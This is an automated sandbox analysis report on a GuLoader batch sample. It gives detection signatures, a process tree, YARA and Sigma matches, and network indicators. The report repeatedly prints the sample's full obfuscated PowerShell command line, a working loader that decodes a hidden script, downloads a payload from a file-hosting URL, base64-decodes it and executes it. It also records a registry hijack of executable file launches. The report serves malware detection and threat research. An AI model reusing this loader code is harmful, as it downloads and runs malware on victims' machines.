Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kam.cmd

Overview

General Information

Sample name:kam.cmd
Analysis ID:1446714
MD5:c7b720a0f6bffebe027826a2508c52dc
SHA1:41b21cdcd0afd9363d1c79202d687c65fc6128b4
SHA256:c67dbe7d1bfb36fcab8391ea0728382445c106fb08ad19f9a3fb3777cdef5562
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1196 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1716 cmdline: powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4856 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5572 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4428 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1272 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 1716JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1716.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_5572.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe066:$b2: ::FromBase64String(
              • 0xd139:$s1: -join
              • 0x68e5:$s4: +=
              • 0x69a7:$s4: +=
              • 0xabce:$s4: +=
              • 0xcceb:$s4: +=
              • 0xcfd5:$s4: +=
              • 0xd11b:$s4: +=
              • 0x17053:$s4: +=
              • 0x170d3:$s4: +=
              • 0x17199:$s4: +=
              • 0x17219:$s4: +=
              • 0x173ef:$s4: +=
              • 0x17473:$s4: +=
              • 0xd90b:$e4: Get-WmiObject
              • 0xdafa:$e4: Get-Process
              • 0xdb52:$e4: Start-Process
              • 0x15b62:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Classes Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 1272, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKa

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: @ntkrnlmp.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbW source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lambda_methodCore.pdb source: powershell.exe, 00000006.00000002.2416249131.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp
